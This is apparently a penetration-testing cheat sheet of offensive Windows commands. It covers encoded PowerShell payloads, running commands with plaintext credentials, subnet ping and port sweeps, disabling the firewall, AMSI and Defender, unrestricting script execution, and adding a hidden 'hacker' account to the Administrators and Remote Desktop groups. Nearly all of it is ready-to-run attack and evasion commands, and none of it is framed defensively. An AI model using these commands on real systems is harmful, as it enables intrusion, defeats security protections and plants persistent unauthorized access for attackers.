# Windows Tricks

# PowerShell encoded base64

Create a base64 payload to avoid bad characters.

# Create the command for PowerShell to execute
$ echo -n 'ping -n 2 10.10.14.2' | iconv -t utf-16le | base64 -w 0
cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==
# Run PowerShell with the Encoded flag
Payload: cmd /c powershell -nop -enc cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==

# Run command as User (with creds)

$pass = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("disco\Alice", $pass)
Invoke-Command -ComputerName disco -Credential $cred -ScriptBlock {whoami}

# List running processes with args

WMIC path win32_process get Caption,Processid,Commandline

# Scan for hosts and open ports in subnet

# Scan for Hosts in Subnet
PS > 1..254 | ForEach-Object {Test-Connection -ComputerName "172.16.2.$_" -Count 1 -ErrorAction SilentlyContinue}
# Scan for open Ports
PS > 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.2.101",$_)) "Port $_ is open!"} 2>$null

# PowerShell

# PowerShell Directory
c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
# FIX THE PATH VARIABLE
set PATH=%SystemRoot%\system32;%SystemRoot%;

# Search for files

Get-Childitem -Path C:\ -Include *filetosearch* -Recurse -ErrorAction SilentlyContinue

# Windows Security

# Disable Firewall

NetSh Advfirewall set allprofiles state off

# Disable AMSI

Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse

# Disable Defender

sc stop WinDefend

# Execution Policy

Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy Unrestricted -Scope CurrentUser

# Add an RDP user

net user hacker hacker123 /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /ADD